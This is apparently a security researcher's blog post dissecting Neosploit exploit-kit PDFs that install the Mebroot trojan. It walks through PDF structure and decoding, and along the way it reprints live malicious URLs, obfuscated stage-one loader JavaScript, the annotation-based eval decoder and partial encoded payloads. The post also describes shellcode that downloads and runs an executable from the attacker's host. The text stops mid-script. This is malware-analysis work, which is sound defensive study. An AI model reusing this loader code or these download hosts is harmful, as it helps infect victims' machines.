Since around October 2009, Neosploit¹, a black-market exploit toolkit, has been generating PDF files in a slightly new way that many parsers find difficult to analyze for maliciousness. In summary, all of the metadata in a PDF is accessible from the Acrobat Javascript environment, and this metadata is being used to obscure embedded Javascript code. To find the exploit, a PDF parser would need to fill in all the document objects with the correct data and then evaluate the Javascript. (Needless to say, many PDF signature parsers don't do this.) These malicious PDFs ultimately install Mebroot (aka Sinowal)².
[And, oh yeah, our product detects this.]
Breaking News
Update: There's another exploit toolkit doing similar metadata tricks to obscure a CVE-2009-4324 attack. (That's the most recent 0-day.)
I'm going to use this for most of my examples (warning: live as of this writing):
google.com.analytics.eicyxtaecun.com/nte/AVORP1TREST11.php
The Wepawet Analysis
The Virus Total Analysis on the downloaded EXE (56a6e96863f6dc0c5c5c64fca6bd3c52)
A Brief Word about Neosploit¹
As with some other toolkits, you can only hit the first exploit page once per source IP; it returns a 404 if you try to fetch it again. The Javascript is broken up into multiple chunks, which the first chunk fetches, deobfuscates, reassembles, and executes. The URI is slightly polymorphic. For example, all of these are really the same program on the server:
google.com.analytics.eicyxtaecun.com/nte/AVORP1TREST11.exe
google.com.analytics.eicyxtaecun.com/nte/AVORP1TREST11.php
google.com.analytics.eicyxtaecun.com/nte/AVORP1TREST11.py
google.com.analytics.eicyxtaecun.com/nte/TREST11 .asp
google.com.analytics.eicyxtaecun.com/nte/TREST11.exe
google.com.analytics.eicyxtaecun.com/nte/TREST11.html
google.com.analytics.eicyxtaecun.com/nte/TREST11.php
google.com.analytics.eicyxtaecun.com/nte/TREST11.py
[etc.]
Files starting with "j" appear to be Javascript, files starting with "e" appear to be EXEs, and files starting with "o" are the polymorphically generated exploit PDFs. Observe:
eH999a4551V0100f070006R00000000102Td2dcca7d201l0409K91a68948320: PE32 executable for MS Windows (DLL)
jH999a4551V0100f070006R00000000102Td2dcca7b201L656e2d75730000000000K91a68948: ASCII text, with very long lines
oH999a4551V0100f070006R00000000102Td2dcca7d201l0409K91a68948317: PDF document, version 1.3
The filename is composed of several fields of hexadecimal value, with separators which are not in the set [0-9a-f] (case sensitive, "F" is a valid separator). From the above example:
j H999a4551 V0100f070006 R00000000102 Td2dcca7b 2 01 L656e2d75730000000000 K91a68948
e H999a4551 V0100f070006 R00000000102 Td2dcca7d 2 01 l0409 K91a68948320
o H999a4551 V0100f070006 R00000000102 Td2dcca7d 2 01 l0409 K91a68948317
The "2 01" is the browser version, and "L656e2d75730000000000" means "en-us" (it is the ASCII string in hex, padded with zero bytes). I haven't bothered to figure out the rest yet.
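A minimal sketch of that field splitting, assuming the first character is the file type and every later character outside [0-9a-f] starts a new field. The names splitFields and hexToAscii are made up for illustration, and the sketch does not try to sub-divide fields by position the way the hand-split examples above do.

```javascript
// Split a Neosploit-style filename into its type prefix and tagged hex fields.
// Assumption: any character outside [0-9a-f] is a field separator/tag.
function splitFields(name) {
  const type = name[0]; // "j", "e" or "o"
  const raw = name.slice(1).match(/[^0-9a-f][0-9a-f]*/g) || [];
  return { type, fields: raw.map(f => ({ tag: f[0], hex: f.slice(1) })) };
}

// Decode a hex field as ASCII, stopping at the first zero byte (padding).
function hexToAscii(hex) {
  let out = "";
  for (let i = 0; i + 1 < hex.length; i += 2) {
    const byte = parseInt(hex.slice(i, i + 2), 16);
    if (byte === 0) break;
    out += String.fromCharCode(byte);
  }
  return out;
}

const parsed = splitFields(
  "jH999a4551V0100f070006R00000000102Td2dcca7b201L656e2d75730000000000K91a68948"
);
console.log(parsed.type, parsed.fields.map(f => f.tag).join(""));
console.log(hexToAscii(parsed.fields[4].hex));
```

Splitting on the separators alone keeps the sketch honest about what is actually known; the meaning of most fields is still a guess.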
This is the first chunk of Javascript that hits your browser. If you started from, say, http://dgvlvhhytlta.com/nte/GNH4.exe it would fetch the next chunk (the variable pums) from http://dgvlvhhytlta.com/nte/GNH4.exe/jH999a4551V0100f070006… These stages are not on the Wepawet analysis I mentioned above, so I'm including them here for completeness.
<html>
<head>
<script>
function nerot(o6v28_IX_KM, D5___o){var O_Pp6_l = arguments.callee;O_Pp6_l = O_Pp6_l.toString();var X6q8_bl = 0;var U_a8___ej = "a" + "f";var Ghc62j5r1Wr8P = document.getElementById(U_a8___ej);if (Ghc62j5r1Wr8P) {if (!D5___o) {D5___o = Ghc62j5r1Wr8P.value;}}X6q8_bl++;X6q8_bl++;var firot = new Array();if (o6v28_IX_KM) { firot = o6v28_IX_KM;} else {var tk_048_6R_6CyPe = 0;var ScS1Bncy_d_8 = 0;var G_2__3A_r = 512;var gw55F_B__BBV2 = 49;gw55F_B__BBV2--;while(ScS1Bncy_d_8 < O_Pp6_l.length) {var G_sv_c7x6qjTn = 1;var m8d_GS__whx = O_Pp6_l.charCodeAt(ScS1Bncy_d_8);if (m8d_GS__whx >= gw55F_B__BBV2 && m8d_GS__whx <= (gw55F_B__BBV2 + 9)) {if (tk_048_6R_6CyPe == 4) { tk_048_6R_6CyPe = 0; }if (isNaN(firot[tk_048_6R_6CyPe])) { firot[tk_048_6R_6CyPe] = 0; }firot[tk_048_6R_6CyPe] += m8d_GS__whx;if (firot[tk_048_6R_6CyPe] > G_2__3A_r) {firot[tk_048_6R_6CyPe] -= G_2__3A_r;}tk_048_6R_6CyPe++;}ScS1Bncy_d_8++;}}tk_048_6R_6CyPe = 4;while (tk_048_6R_6CyPe > 0) {if (firot[tk_048_6R_6CyPe - 1] > 256) {firot[tk_048_6R_6CyPe - 1] -= 256;}tk_048_6R_6CyPe--;}var QmyQ7eL0R = 0;var x1Kf_448jleM42 = "";var sp__yv_2g_K04cp = 0;var j_G1g_1 = 0;var T__D6_r = 0;var y_6A__C_u;var pdbpQb = 0;while(j_G1g_1 < D5___o.length) {var T_B203hvS__Wvt = D5___o.substr(j_G1g_1, 1) + "J";var Pbukfx_2f7D__1w = parseInt(T_B203hvS__Wvt, 16);if (T__D6_r) {y_6A__C_u += Pbukfx_2f7D__1w;if (QmyQ7eL0R == 4) {QmyQ7eL0R -= 4;}var iJ_d_Qth = y_6A__C_u;iJ_d_Qth = iJ_d_Qth - (pdbpQb + 2) * firot[QmyQ7eL0R];if (iJ_d_Qth < 0) {var xgY5uT7__QoL = Math.floor(iJ_d_Qth / 256);iJ_d_Qth = iJ_d_Qth - xgY5uT7__QoL * 256;}iJ_d_Qth = String.fromCharCode(iJ_d_Qth);if (X6q8_bl == 1) {x1Kf_448jleM42 += Pbukfx_2f7D__1w;} else if (X6q8_bl == 2) {x1Kf_448jleM42 += iJ_d_Qth;} else {x1Kf_448jleM42 += j_G1g_1;}QmyQ7eL0R++;pdbpQb++;T__D6_r = 0;} else {y_6A__C_u = Pbukfx_2f7D__1w * 16;T__D6_r = 1;}j_G1g_1++;};;eval(x1Kf_448jleM42);return 0;}
</script>
</head>
<body onload="nerot() ;">
<input type="hidden" id="aa" value="1">
<input type="hidden" id="af" value="F2D096B1BB5AA764CBE6B0E3B18 […] 745A6F">
<input type="hidden" id="ab" value="1">
</body>
</html>
And the second chunk:
var pums = 'C8763EB09A160F5F0AC4C
… EB76';
Find The Pattern
Here are some names of generated PDFs. I've broken the names up into what I believe are separate fields. See if you can find the pattern. None of these is obviously an IP address. (I checked for that.)
AVORP1TREST11.exe/o U2773a43b H918373c0 V03007f35002 R8d56bfa1108 Tdac6495d Q000002fc900801 F0020000a J11000601l0409 Kfa01dcdb317: PDF document, version 1.3
AVORP1TREST11.php/o Hf7b12f26 V0100f060006Rf53e765c102 Tbcf2d195204 l0409 K98c2615b317: PDF document, version 1.3
AVORP1TREST11.py/o H999a4551 V0100f070006R00000000102 Td2dcca7d201 l0409 K91a68948317: PDF document, version 1.3
AVORP1TREST11.py/o H9efd3f2d V03006f35002Rf53e765c102 Td5b83f0c Q000002fa901801 F0020000a J11000601 l0409 K5b7f0e41317: PDF document, version 1.3
TREST11 .asp/o H47834891 V0100f060006 R89a36f9c102 T0cc787be203l0409 K07105315317: PDF document, version 1.3
TREST11 .asp/o H91b0de2f V0100f070006 R8f56bc05102 Tdaf42f62201l0404 K544d4bfe317: PDF document, version 1.3
TREST11 .asp/o Ha98d29bd V0100f060006 R89a36f9c102 Te2cb340e204l0409 K4b290413317: PDF document, version 1.3
TREST11 .asp/o He22f9c5c V03007f35002 R8d56bfa1102 Ta96aa0ae Q000002fc901801 F000c000a J10000601 l0409 Kc5ceb2bf317: PDF document, version 1.3
TREST11 .asp/o Hf7ba1c39 V03005f35002 Rf53e765c102 Tbcff3946 Q000002fd901801 F0020000a J11000601 l0409 K4e3afa12317: PDF document, version 1.3
TREST11.exe/o H30847807 V0100f060006 R89a36f9c102 T7bc0ed53203l0409 K7b4d501b317: PDF document, version 1.3
TREST11.exe/o H3ebec388 V03007f35002 Rf53e765c102 T75fbc09a Q000002fc901801 F002a000a J11000601 l0409 Kaa9ea783317: PDF document, version 1.3
TREST11.exe/o H82fea487 V0100f080006 Rf53e765c102 Tc9bb26de201l0409 Kfee4acbe317: PDF document, version 1.3
TREST11.html/o H8b9e4040 V03007f35002 Rf53e765c102 Tc0db4487 Q000002fd901801 F002a000a J11000601 l0409 K575b6c55317: PDF document, version 1.3
TREST11.html/o H9ee97623 V03006f35002 Rf53e765c108 Td5ad4a05 Q000002fd900801 F0020000a J11000601 l0409 K539b6710317: PDF document, version 1.3
TREST11.html/o Ha98d29bd V0100f060006 Rf53e765c102 Te2cb34e5204 l0409K35e5f3e5317: PDF document, version 1.3
TREST11.html/o Hd6a7ae5c V0100f080006 Rf53e765c102 T9de446b5201 l0409Kab6a7970317: PDF document, version 1.3
TREST11.php/o H47834891 V0100f060006 Rf53e765c102 T0cc6cd94203 l0409K6c8c5ba1317: PDF document, version 1.3
TREST11.php/o Hdfab3f7e V0100f080006 R8d56bfa110a T94ee748e201 l0409K678f4226317: PDF document, version 1.3
TREST11.php/o Hff15790b V03006f35002 Rf53e765c10a Tb4506ce8 Q000002fc901801 F002a000a J00000000 l0409 Kadd89d89317: PDF document, version 1.3
TREST11.py/o H28d77e41 V0100f060006 R7bd67009102 T63951338203 l0409 K3c732e33317: PDF document, version 1.3
TREST11.py/o H9ef9bb5c V03007f35002 Rf53e765c102 Td5bdef71 Q000002fc901801 F0020000a J11000601 l0409 Kd3978d8b317: PDF document, version 1.3
TREST11.py/o Hde8a192b V0100f060006 R8f56bc05102 T95cf8f5f203 l0409 K6f2c23ff317: PDF document, version 1.3
TREST11.py/o He5441011 V0100f070006 R89a36f9c102 Tae012b23201 l0804 Ka373855f317: PDF document, version 1.3
TREST11.py/o Hf9287a3c V03006f35002 Rf53e765c10a Tb26c5103 Q000002fc900801 F0020000a J00000000 l0409 Kf8aab2d0317: PDF document, version 1.3
TREST11.py/o Hfb50394b V03007f35002 Rf53e765c102 Tb0152511 Q00000000901801 F002a000a J11000601 l0409 K77546b04317: PDF document, version 1.3
chrisbecfiis.com/nte/AVORP1TREST1.py/eH999a4551V0100f070006R00000000102Td2b6e14c201l0409K816c9c70320: PE32 executable for MS Windows (DLL) (GUI) Intel 80386 32-bit
cjbtiybcpnf.com/nte/trest11.py/eH999a4551V0100f070006R00000000102Td2a93f54201l0409320: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
google.com.analytics.eicyxtaecun.com/nte/AVORP1TREST11.py/eH999a4551V0100f070006R00000000102Td2dcca7d201l0409K91a68948320: PE32 executable for MS Windows (DLL) (GUI) Intel 80386 32-bit
I guess that's more than a brief word.
How To Speak PDF
The PDF itself is rather clean and easy to read³, so I'll step you through it here.
First⁴, Acrobat checks that the first line is %PDF-1.something and that the last line is %%EOF. The second and third lines from the end are the offset (in bytes) to the cross reference table (the list of objects in the file) and the word startxref. Somewhere near all that is the trailer dictionary, which says there are nine objects in this file.
The cross reference table (xref) is consulted; it says there are nine entries in this table, and that…
Object #1 starts at byte offset 17. (0x11)
Object #2 starts at offset 93. (0x5D), etc…
It's possible to have multiple xref tables by design, so that PDF files can be incrementally updated. [The purpose of this is so that a PDF reader can find each object quickly, without needing to scan the entire file first to locate it, and without needing to rewrite the entire file just to edit something.]
xref
0 9
← This table has 9 entries, starting at object 0 (objects 0 through 8)
0000000000 65535 f
← A "Free" (Deleted) Object; Generation 65535 means never reuse this number
0000000017 00000 n
← Object 1 starts at offset 17 bytes
0000000093 00000 n
← Object 2 starts at offset 93 bytes
0000000134 00000 n
← Object 3 starts at offset 134 bytes
⇑ Generation number goes up by one for any object number freed and reused.
[etc.]
0000000411 00000 n
← Object 7 starts at offset 411 bytes
0000000641 00000 n
← Object 8 (9th counting from 0)
trailer<</Size 9/Root 1 0 R>> ← Nine objects, Object 1 is the top of the document object tree (The /Catalog object).
startxref
9323
← Offset to the above xref
%%EOF
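A minimal sketch of reading such a table, assuming a single contiguous subsection and the classic fixed-width entries shown above (no cross-reference streams, no incremental updates). parseXref is a hypothetical helper name, not part of any PDF library.

```javascript
// Parse a classic xref section into a list of entries.
// Assumption: one subsection only, entries of the form "oooooooooo ggggg n|f".
function parseXref(text) {
  const lines = text.split(/\r?\n/).map(l => l.trim()).filter(l => l.length > 0);
  if (lines[0] !== "xref") throw new Error("not an xref section");
  const [first, count] = lines[1].split(/\s+/).map(Number);
  const entries = [];
  for (let i = 0; i < count; i++) {
    const m = /^(\d{10}) (\d{5}) ([nf])$/.exec(lines[2 + i]);
    if (!m) throw new Error("bad xref entry: " + lines[2 + i]);
    entries.push({
      object: first + i,               // object number
      offset: parseInt(m[1], 10),      // byte offset (or next free object for "f")
      generation: parseInt(m[2], 10),
      inUse: m[3] === "n",
    });
  }
  return entries;
}

const table = parseXref([
  "xref", "0 9",
  "0000000000 65535 f", "0000000017 00000 n", "0000000093 00000 n",
  "0000000134 00000 n", "0000000184 00000 n", "0000000266 00000 n",
  "0000000358 00000 n", "0000000411 00000 n", "0000000641 00000 n",
].join("\r\n"));
console.log(table.filter(e => e.inUse).map(e => e.object + "@" + e.offset).join(" "));
```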
Offset Examples
00000000 25 50 44 46 2d 31 2e 33 0d 0a 25 b1 b3 f3 ce 0d |%PDF-1.3..%.....|
00000010 0a 31 20 30 20 6f 62 6a 3c 3c 2f 54 79 70 65 2f |.1 0 obj<</Type/|
⇑ Byte 17 (0x11) is a "1"
[…]
00000040 20 52 2f 4f 70 65 6e 41 63 74 69 6f 6e 20 36 20 | R/OpenAction 6 |
00000050 30 20 52 3e 3e 65 6e 64 6f 62 6a 0d 0a 32 20 30 |0 R>>endobj..2 0|
⇑ Byte 93 (0x5D) is a "2"
00000060 20 6f 62 6a 3c 3c 2f 54 79 70 65 2f 4f 75 74 6c | obj<</Type/Outl|
[…]
00002450 ff 03 a2 65 8b 77 0d 0a 65 6e 64 73 74 72 65 61 |...e.w..endstrea|
00002460 6d 0d 0a 65 6e 64 6f 62 6a 0d 0a 78 72 65 66 0d |m..endobj..xref.|
⇑ Byte 9323 (0x246B) is the start of "xref"
00002470 0a 30 20 39 0d 0a 30 30 30 30 30 30 30 30 30 30 |.0 9..0000000000|
The comment near the beginning of the file (the four bytes with their high bits set) is a way to warn systems that distinguish between 'text' and 'binary' file modes that this file is going to be 'binary'.
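A quick way to sanity-check an xref offset is to look at what actually sits at that byte. The sketch below assumes the file is already in a Node Buffer; objectAt is a hypothetical helper, and the sample buffer just reproduces the first 17 bytes from the hex dump above followed by a stand-in object.

```javascript
// Return the object number and generation found at a byte offset, or null
// if the bytes there do not look like "<number> <generation> obj".
function objectAt(buf, offset) {
  const head = buf.toString("latin1", offset, offset + 32);
  const m = /^(\d+) (\d+) obj/.exec(head);
  return m ? { object: Number(m[1]), generation: Number(m[2]) } : null;
}

const sample = Buffer.concat([
  Buffer.from("%PDF-1.3\r\n", "latin1"),                     // 10 bytes
  Buffer.from([0x25, 0xb1, 0xb3, 0xf3, 0xce, 0x0d, 0x0a]),   // binary comment, 7 bytes
  Buffer.from("1 0 obj<</Type/Catalog>>endobj\r\n", "latin1"),
]);
console.log(objectAt(sample, 17)); // the offset the xref table gives for object 1
console.log(objectAt(sample, 16)); // one byte early: not an object header
```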
Brief Syntax Guide
- Anything between % and end-of-line is a comment.
- Anything between ()'s is a literal string.
- Anything starting with a / is a Name.
- Anything inside of []'s is an array.
- Anything inside of stream endstream is a data stream (think of it as a very large string constant or blob).
- Anything inside of <<>> is a dictionary (name-value pairs, like this: <</Type /foo /Thingy 123456>>).
- Indirect objects are defined like Object_Number Version obj Stuff endobj. For example: 123 45 obj(I'm a literal string)endobj.
- An indirect object can be used (referenced) from anywhere else that a normal object (string, integer, etc.) would go, by simply writing the object number and version number followed by an R. For example: 123 45 R substitutes for that literal string in the example above.
- Every useful dictionary object has an entry for what /Type it is. For example, the /Catalog type is used for the document tree root, and /Font is used for font objects.
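To follow the object tree by hand, it helps to pull the "/Name N G R" references out of a dictionary. This is only a rough sketch with a regex, not a PDF tokenizer: it assumes the dictionary is plain text, and it deliberately ignores references inside arrays such as /Kids[4 0 R]. findReferences is a made-up name.

```javascript
// Map each /Name that is directly followed by an indirect reference
// ("N G R") to the object number and generation it points at.
function findReferences(dictText) {
  const refs = {};
  const re = /\/([A-Za-z]+)\s*(\d+)\s+(\d+)\s+R\b/g;
  for (const m of dictText.matchAll(re)) {
    refs[m[1]] = { object: Number(m[2]), generation: Number(m[3]) };
  }
  return refs;
}

const catalog = "<</Type/Catalog/Outlines 2 0 R/Pages 3 0 R/OpenAction 6 0 R>>";
console.log(findReferences(catalog));
```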
That Neosploit PDF
Object #1 (The Catalog object) says that…
Object #2 is the top of the Outline tree (that side panel in your PDF viewer)…
Object #3 is the top of the Page tree…
And to perform the action in Object #6 when the document is opened.
Object #2 says there really isn't an outline for this document.
Object #3 says there is one page in the tree, which is Object #4 .
Object #6 says to execute the Javascript in Object #7.
Object #4 is the descendant of Object #3. It says the page size is 612x792 points (or 8.5x11 inches), and that it contains an Annotation, with the annotation details in Object #5…
Object #5 says that Object #8 is the Subject of this Annotation (The sekret Javascript exploit code).
These are the good parts:
Object #7 is the Javascript that's executed upon document open. It's a decoder for the Javascript hidden in…
Object #8 The Annotation Subject string, a large blob of encoded Javascript.
In PDF-Speak
%PDF-1.3
%
→ Four bytes between 0x80 and 0xFF
1 0 obj<</Type/Catalog/Outlines 2 0 R/Pages 3 0 R/OpenAction 6 0 R>>endobj
2 0 obj<</Type/Outlines/Count 0>>endobj
3 0 obj<</Type/Pages/Kids[4 0 R]/Count 1>>endobj
4 0 obj<</Type/Page /Annots[ 5 0 R ]/Parent 3 0 R/MediaBox [0 0 612 792]>>endobj
5 0 obj<</Type/Annot /Subtype /Text /Name /Comment/Rect[25 100 60 115] /Subj 8 0 R>>endobj
6 0 obj<</Type/Action/S/JavaScript/JS 7 0 R>>endobj
7 0 obj<</Length 158/Filter/FlateDecode>>
stream
— The zlib compressed data goes here —
endstream
endobj
8 0 obj<</Length 8609/Filter/FlateDecode>>
stream
— The other zlib compressed data goes here —
endstream
endobj
xref
0 9
0000000000 65535 f
0000000017 00000 n
0000000093 00000 n
0000000134 00000 n
0000000184 00000 n
0000000266 00000 n
0000000358 00000 n
0000000411 00000 n
0000000641 00000 n
trailer<</Size 9/Root 1 0 R>>
startxref
9323
%%EOF
Analysis
The /FlateDecode streams are compressed with the deflate algorithm, the exact same one used in PKZip, gzip, and PNG.
If you're trapped on a desert island with only primitive Unix tools, you can just slap a gzip header onto the beginning of the zlib compressed blob and use gunzip to decompress it. (Don't forget to add four bytes to the end for the length.)
$ echo -ne "\x1f\x8b\x08\x00BLAH" > example.gz
$ cat stream7 >> example.gz
$ echo -ne "\x00\x00\x00\x00" >> example.gz
$ zcat example.gz |less
zcat: example.gz: invalid compressed data--crc error
zcat: example.gz: invalid compressed data--length error
var z; var y; z = y = app.doc;
y = 0; z.syncAnnotScan ( ); y = z;var p = y.getAnnots( { nPage: 0 }) ;var s = p[0].subject; var l = s.replace(/z/g, '%'); s = unescape (l) ;eval(s); s = ''; z = 1;
Hey look! It's Javascript!
This trick only works as long as bit 5 of the second byte of the zlib stream is not set (which I've not seen in a PDF stream yet). I'd explain why this works, but this blog post is too long already. Compare RFC1950 Section 2.2 vs. RFC1952 Section 2.3 if you really want to know. You can also decompress the stream with a pencil and paper if you don't have a computer. It's not that difficult; just remember that the bits in each octet are reversed from how they look in RFC1951. (Why are y'all looking at me like that? I had to fix a corrupt zip file…)
Otherwise use xpdf or Didier Stevens' tool(s) like a normal person.
pdftosrc oH999a4551V0100f070006R00000000102Td2dcca7d201l0409K91a68948317 7
pdftosrc oH999a4551V0100f070006R00000000102Td2dcca7d201l0409K91a68948317 8
python pdf-parser.py -f oH999a4551V0100f070006R00000000102Td2dcca7d201l0409K91a68948317
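If Node happens to be on your desert island, its bundled zlib module will inflate a stream body directly. A minimal sketch, assuming you have already cut the bytes between stream and endstream into a Buffer; the three function names are mine. (The short version of the gzip trick: the eight bytes echoed above are most of a ten-byte gzip header, so the two-byte zlib header lands in the last two header slots and the raw deflate data follows. With bit 5, the preset dictionary flag, set there would be four extra bytes in the way.)

```javascript
const zlib = require("zlib");

// True if the zlib header's FDICT flag (bit 5 of the second byte) is set.
function hasPresetDictionary(stream) {
  return (stream[1] & 0x20) !== 0;
}

// Inflate a /FlateDecode stream body (zlib format, RFC 1950) to a string.
function inflateStream(stream) {
  return zlib.inflateSync(stream).toString("latin1");
}

// The same data as raw deflate: skip the 2-byte zlib header and drop the
// 4-byte Adler-32 trailer. Only valid when no preset dictionary is used.
function inflateRawBody(stream) {
  const body = stream.subarray(2, stream.length - 4);
  return zlib.inflateRawSync(body).toString("latin1");
}

// Stand-in for a real stream: compress a snippet, then unpack it both ways.
const packed = zlib.deflateSync(Buffer.from("var z; var y; z = y = app.doc;", "latin1"));
console.log(hasPresetDictionary(packed));
console.log(inflateStream(packed));
console.log(inflateRawBody(packed));
```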
Back to the PDF
This is the uncompressed stream from Object #7.
Almost every PDF I've examined so far has this exact same code in Object #7. (There's apparently a newer version of the toolkit which does a little bit of obfuscation on this block.)
var z; var y; z = y = app.doc;
y = 0; z.syncAnnotScan ( ); y = z;var p = y.getAnnots( { nPage: 0 }) ;var s = p[0].subject; var l = s.replace(/z/g, '%'); s = unescape (l) ;eval(s); s = ''; z = 1;
[This getAnnots() usage is completely unrelated to CVE-2009-1492]
The uncompressed stream from Object #8 (the subject of this annotation, and the second stage of Javascript) is:
z0dz0az0dz0az09z66z75z6ez63z74z69z
[…]
The z characters are replaced by %, and then the whole thing is unescape()'d. I've seen other variants use y, g, or h, and a little more obfuscation of the code above.
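For static analysis you don't need to run any of the sample's code to undo this layer. The sketch below decodes marker-plus-two-hex-digit pairs directly and never calls eval(). It assumes the marker is a single plain letter (z, y, g, or h in the samples I've seen); decodeSubject is a hypothetical name.

```javascript
// Undo the "%xx with % swapped for a letter" encoding of the annotation subject.
// Assumption: marker is one plain letter, so it needs no regex escaping.
function decodeSubject(subject, marker) {
  const re = new RegExp(marker + "([0-9a-fA-F]{2})", "g");
  return subject.replace(re, (_, hex) => String.fromCharCode(parseInt(hex, 16)));
}

const sampleText = "y0dy0ay0dy0ay09y66y75y6ey63y74y69y6fy6ey20y58y36";
console.log(JSON.stringify(decodeSubject(sampleText, "y")));
```

Anything that is not a marker followed by two hex digits is passed through untouched, which is handy for spotting truncated input.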
More obfuscation from a different Neosploit toolkit
For Example:
var z; var y;
var h = 'edvoazcl';
z = y = app[h.replace(/[aviezjl]/g, '')];
var tmp = 'syncAEEotScan'; y = 0; z[tmp.replace(/E/g, 'n')](); y = z; var p = y.getAnnots ( { nPage: 0 }) ; var s = p[0]; s = s['sub' + 'ject']; var l = s.replace(/[zhyg]/g, '%') ; s = unescape ( l ) ;app[h.replace(/[czomdqs]/g, '')]( s);
s = ''; z = 1;
In this sample the 'y' characters are replaced by '%' (the regex also accepts 'z', 'h', and 'g'), and then the whole thing is unescaped.
s.replace(/[zhyg]/g, '%')
y0dy0ay0dy0ay09y66y75y6ey63y74y69y6fy6ey20y58y36y5fy5fy34y6by33y56y64y4ay56y62y30y49y64y28y76y5fy5fy4dy61y78y6ay2cy20y70y30y5fy59y32y54y29y7by76y61y72y20y73y5fy5fy5fy51y33y35y68y
[...]
About syncAnnotScan and getAnnots
12.5.6.4 Text Annotations
A text annotation represents a “sticky note” attached to a point in the PDF document. When closed, the annotation shall appear as an icon; when open, it shall display a pop-up window containing the text of the note in a font and size chosen by the conforming reader. Text annotations shall not scale and rotate with the page; they shall behave as if the NoZoom and NoRotate annotation flags (see Table 165) were always set. Table 172 shows the annotation dictionary entries specific to this type of annotation.
— From the PDF 1.7 Reference ISO 32000-1:2008.
So let's take a look at that annotation object again:
5 0 obj <<
/Type/Annot
/Subtype /Text
← This is a Text Annotation
/Name /Comment
← Default to a Comment-Style Icon for display
/Rect[25 100 60 115]
← Location of the annotation on page.
/Subj 8 0 R
← Subject is that object full of encoded Javascript
>>endobj
- /Subj
- Text representing a short description of the subject being addressed by the annotation. ISO 32000-1
The getAnnots() function returns an array of annotation objects, and accepts an associative array with the following possible labels [ibid.]:
nPage
- A 0-based page number. If not set, all pages that match filter.
nSortBy
- A sort method applied to the array. (by Page, Author, Moddate, etc.)
bReverse
- If true, causes the array to be reverse sorted with respect to nSortBy.
nFilterBy
- Gets only annotations satisfying certain criteria. (Printable, viewable, editable, etc.)
Contrast this with getAnnot() which returns a single Annot object by name.
Example
// From the Acrobat JavaScript Scripting Reference
// All annotations on the first page, in reverse order by author.
var annots = this.getAnnots({
nPage:0,
nSortBy: ANSB_Author,
bReverse: true
});
Cleaned Up Code With Commentary
var z;var y;
z = y = app.doc;
y = 0;
z.syncAnnotScan ( ); // Acrobat scans for annotations in the
// document, as a background task.
// This function blocks until all of the
// annotations in the document have been found.
y = z;
var p = y.getAnnots( { nPage: 0 }) ; // This is the new technique.
// getAnnots() returns a list of annotation
// objects. (For the first page in this case)
var s = p[0].subject; // Get the subject from the first annotation
// object.
var l = s.replace(/z/g, '%'); // The 'z' characters are replaced by '%'
s = unescape (l) ; // and then the whole thing unescape()'d
eval(s); // Run the second stage Javascript
s = '';
z = 1;
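This is the part a parser has to fake: the script only works if app.doc, syncAnnotScan(), getAnnots(), and the annotation's subject are all there with the right data. A minimal sketch of such a stand-in follows. Every name in it (makeFakeApp, runStageOne, evalHook) is hypothetical, it assumes a single page, and it hands the decoded text to a callback instead of eval()ing it.

```javascript
// Hypothetical stand-in for the handful of Acrobat objects stage one touches.
function makeFakeApp(subjects) {
  const annots = subjects.map(s => ({ subject: s }));
  const doc = {
    syncAnnotScan() {},                  // nothing to wait for in the stub
    getAnnots(opts) { return annots; },  // ignores nPage: single-page assumption
  };
  return { doc };
}

// Same steps as the cleaned-up code above, minus the eval().
function runStageOne(app, evalHook) {
  const doc = app.doc;
  doc.syncAnnotScan();
  const subject = doc.getAnnots({ nPage: 0 })[0].subject;
  const decoded = unescape(subject.replace(/z/g, "%"));
  return evalHook(decoded); // caller decides what to do with stage two
}

const fakeApp = makeFakeApp(["z61z3dz31"]);
console.log(runStageOne(fakeApp, text => text));
```

In a real pipeline the subjects would come from the inflated /Subj stream of each annotation, and the hook would log or scan the text rather than run it.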
The Next Part
The third layer of this Javascript onion will decode the next part differently, depending on whether or not the app object is defined. (It is defined inside of Acrobat Reader, but not within most other ECMAScript/Javascript engines.) If your parser doesn't get a "2" out of this:
try {
if (app) {
magic_value = 2;
}
} catch(e) {
}
Then it's going to eval() gibberish. If decoded correctly, it does a heap spray and exploits Collab.collectEmailInfo().
The shellcode does HTTP download and execute from:
http://google.com.analytics.eicyxtaecun.com/nte/AVORP1TREST11.py/eH999a4551V0100f070006R00000000102Td2dcca7d201l0409K91a68948320
… What Virustotal says about it: 56a6e96863f6dc0c5c5c64fca6bd3c52 (It's Mebroot).
function X6__4k3VdJVb0Id(v__Maxj, p0_Y2T){var s___Q35hFa = arguments.callee;var a4__LfE__5a6 = 0;var Do_
YD6N_7p40_r = 512;s___Q35hFa = s___Q35hFa.toString();try {if (app) {a4__LfE__5a6 = 3;a4__LfE__5a6--;}} catch(e)
{ }var M8I2Nb0IWaPT7 = new Array();if (v__Maxj) { M8I2Nb0IWaPT7 = v__Maxj;} else {var s4_AeGcS_Ru807 = 0;var OKD
_8Y_tjg = 0;var a_i_qruF1_u = 49;a_i_qruF1_u--;while(OKD_8Y_tjg < s___Q35hFa.length) {var hYE0g_2_q = 1;var rTb_
w_VCb55 = s___Q35hFa.charCodeAt(OKD_8Y_tjg);if (rTb_w_VCb55 >= a_i_qruF1_u && rTb_w_VCb55 <= (a_i_qruF1_u + 9))
{if (s4_AeGcS_Ru807 == 4) { s4_AeGcS_Ru807 = 0; }if (isNaN(M8I2Nb0IWaPT7[s4_AeGcS_Ru807])) { M8I2Nb0IWaPT7[s4_Ae
GcS_Ru807] = 0; }M8I2Nb0IWaPT7[s4_AeGcS_Ru807] += rTb_w_VCb55;if (M8I2Nb0IWaPT7[s4_AeGcS_Ru807] > Do_YD6N_7p40_r
) {M8I2Nb0IWaPT7[s4_AeGcS_Ru807] -= Do_YD6N_7p40_r;}s4_AeGcS_Ru807++;}OKD_8Y_tjg++;}}s4_AeGcS_Ru807 = 4;Do_YD6N
7p40_r = 256;while (s4_AeGcS_Ru807 > 0) {var OKD_8Y_tjg = s4_AeGcS_Ru807 - 1;if (M8I2Nb0IWaPT7[OKD_8Y_tjg] > Do_
YD6N_7p40_r) {M8I2Nb0IWaPT7[OKD_8Y_tjg] -= Do_YD6N_7p40_r;}s4_AeGcS_Ru807--;}var F_kH_v = 0;var eG76_l = "";var
JtRA2__j_Ae = 0;var GbFYrkx_PbnQ6f6 = 0;var J8_i60lnd = 0;var ltqGwaY;var I1_EB__2_wf = 0;while(GbFYrkx_PbnQ6f6
